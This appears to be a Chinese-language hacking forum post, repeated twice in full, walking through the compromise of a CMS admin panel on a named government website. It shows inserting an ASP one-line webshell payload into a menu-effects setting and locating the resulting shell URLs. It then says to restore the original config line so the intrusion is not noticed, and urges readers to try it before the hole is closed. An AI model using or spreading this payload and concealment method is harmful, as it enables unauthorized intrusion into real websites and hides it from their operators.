进入后台的方法就不说了 网上有免费动画
1,用超管登陆
2,进入 文章中心管理 顶部菜单设置 菜单其它特效
filter:Glow(Color=#000000, Strength=3) 我们帮他保存一下 等下要还原的!
3,插入一句话马
"%><%execute request("l")%><%' '号 一定要
顶部栏目菜单参数设置成功!
这时 我们插入了一个马 地址在下面 rootclass_menu_config.asp 这个文件 我们看一下
http://www.leisure.gov.cn/admin/rootclass_menu_config.asp
Microsoft VBScript 运行时错误 错误 '800a000d'
类型不匹配: 'execute'
/admin/rootclass_menu_config.asp,行 11
显示 成功!!
连接1句话
http://www.leisure.gov.cn/admin/ok2.asp 这个就是小马的地址了
我就不传大马上去了 这时候 已经99%可以拿到webshell了!!
4,记得进了webshell后把源文件 rootclass_menu_config.asp 改回来 ,不然太明显了!
现在我们再看看这个 顶部菜单设置
不行了吧!!所以要改回来! 在admin下这个文件
Const RCM_Menu_9=""%><%execute request("l")%><%'" '其它特效
这个就是插入的效果 我们改回来
Const RCM_Menu_9="filter:Glow(Color=#000000, Strength=3)" '其它特效
慢了点
这样 我们就可以利用前段时间出来的根据短消息那个注入 拿到一个webshell 大家赶快去试吧!不然完了就来不及了!!
现在正常了吧 !哈哈 88
1,用超管登陆
2,进入 文章中心管理 顶部菜单设置 菜单其它特效
filter:Glow(Color=#000000, Strength=3) 我们帮他保存一下 等下要还原的!
3,插入一句话马
"%><%execute request("l")%><%' '号 一定要
顶部栏目菜单参数设置成功!
这时 我们插入了一个马 地址在下面 rootclass_menu_config.asp 这个文件 我们看一下
http://www.leisure.gov.cn/admin/rootclass_menu_config.asp
Microsoft VBScript 运行时错误 错误 '800a000d'
类型不匹配: 'execute'
/admin/rootclass_menu_config.asp,行 11
显示 成功!!
连接1句话
http://www.leisure.gov.cn/admin/ok2.asp 这个就是小马的地址了
我就不传大马上去了 这时候 已经99%可以拿到webshell了!!
4,记得进了webshell后把源文件 rootclass_menu_config.asp 改回来 ,不然太明显了!
现在我们再看看这个 顶部菜单设置
不行了吧!!所以要改回来! 在admin下这个文件
Const RCM_Menu_9=""%><%execute request("l")%><%'" '其它特效
这个就是插入的效果 我们改回来
Const RCM_Menu_9="filter:Glow(Color=#000000, Strength=3)" '其它特效
慢了点
这样 我们就可以利用前段时间出来的根据短消息那个注入 拿到一个webshell 大家赶快去试吧!不然完了就来不及了!!
现在正常了吧 !哈哈 88
